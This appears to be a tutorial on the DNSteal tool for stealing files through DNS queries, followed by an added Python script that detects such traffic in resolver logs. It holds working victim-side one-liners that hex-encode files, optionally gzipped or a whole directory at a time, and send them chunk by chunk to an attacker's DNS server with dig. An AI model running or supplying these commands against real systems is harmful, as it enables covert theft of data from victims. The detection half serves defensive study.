
data exfiltration – DNSteal


Dnsteal is a data exfiltration tool for stealthily sending files over DNS requests. Once set up and running, it acts as a fake DNS server that lets you stealthily extract files from a victim machine, one chunk per DNS query.

Install & start server
git clone https://github.com/dutchcoin/dnsteal.git /opt/dnsteal

cd /opt/dnsteal && python dnsteal.py

Transfer file from the victim
On the victim machine, you can simply run something like this:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

On the server side you will see the file transfer start:
When the transfer is finished, you must stop the server with CTRL-C to save the file and view its md5sum.
You can verify the md5sum on the victim's machine by running:
md5sum filename

Features:

Support for multiple files
Dnsteal supports exfiltrating multiple files. Use it as below (the original one-liner referenced an undefined $f and wrote %b for $b; both are corrected here):
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
gzip compression supported

It also supports gzip compression of the file to allow for faster transfers. This is enabled with the "-z" switch:
python dnsteal.py 127.0.0.1 -z

Then, on the victim machine, send a gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
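From the defender's side, the traffic these loops produce is easy to characterise: a burst of queries whose leftmost label is a long lowercase-hex string (xxd -p emits 30 bytes, i.e. 60 hex characters, per line), all landing under one zone. The following Python script is an added example, not part of the original post or of the dnsteal project; it assumes a simplified "timestamp client qname" resolver log (constructed inline) and groups hex-chunk queries per client and zone, then looks at the reassembled leading bytes to tell a raw file from a gzip-compressed (-z) one.

```python
import re
from collections import defaultdict

# Constructed resolver-style query log (not from the original post): "<ts> <client> <qname>".
# The long leftmost labels mimic what `xxd -p` produces: 30 bytes (60 hex chars) per query.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 www.example.org
2024-01-01T10:00:01 10.0.0.5 89504e470d0a1a0a0000000d494844520000002000000020080600000073.filename.com
2024-01-01T10:00:01 10.0.0.5 f1f2a7000000017352474200aece1ce90000000467414d410000b18f0bfc.filename.com
2024-01-01T10:00:02 10.0.0.5 6105000000097048597300000ec3.filename.com
2024-01-01T10:00:02 10.0.0.9 1f8b0800000000000003.archive.com
2024-01-01T10:00:03 10.0.0.9 cb48cdc9c957c8cf4bd5e30200.archive.com
2024-01-01T10:00:03 10.0.0.7 mail.example.org
"""

HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){8,31}$")  # 16..62 hex chars, whole bytes only
MAGIC = {b"\x89PNG": "png", b"\x1f\x8b": "gzip"}     # gzip is what the -z mode carries

def parse_query_log(text):
    """Yield (client, qname) pairs from the simplified log format above."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            yield parts[1], parts[2].rstrip(".").lower()

def hex_chunk_queries(text):
    """Group hex-looking leftmost labels by (client, zone), keeping arrival order."""
    buckets = defaultdict(list)
    for client, qname in parse_query_log(text):
        labels = qname.split(".")
        if len(labels) >= 3 and HEX_LABEL.match(labels[0]):
            buckets[(client, ".".join(labels[1:]))].append(labels[0])
    return buckets

def guess_type(chunks):
    """Reassemble the chunks in arrival order and classify the leading bytes by magic."""
    head = bytes.fromhex("".join(chunks))[:4]
    return next((name for magic, name in MAGIC.items() if head.startswith(magic)), "unknown")

def report(text, threshold=3):
    """Return [(client, zone, chunk_count, guessed_type)] for zones at or above threshold."""
    return [(c, z, len(v), guess_type(v))
            for (c, z), v in hex_chunk_queries(text).items() if len(v) >= threshold]

if __name__ == "__main__":
    for row in report(SAMPLE_LOG, threshold=2):
        print("client=%s zone=%s chunks=%d type=%s" % row)
```

Legitimate hostnames occasionally look like hex (CDN and cache-busting labels), so the per-zone threshold and query rate matter more than any single match; tune the threshold against your own resolver logs before alerting on it.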
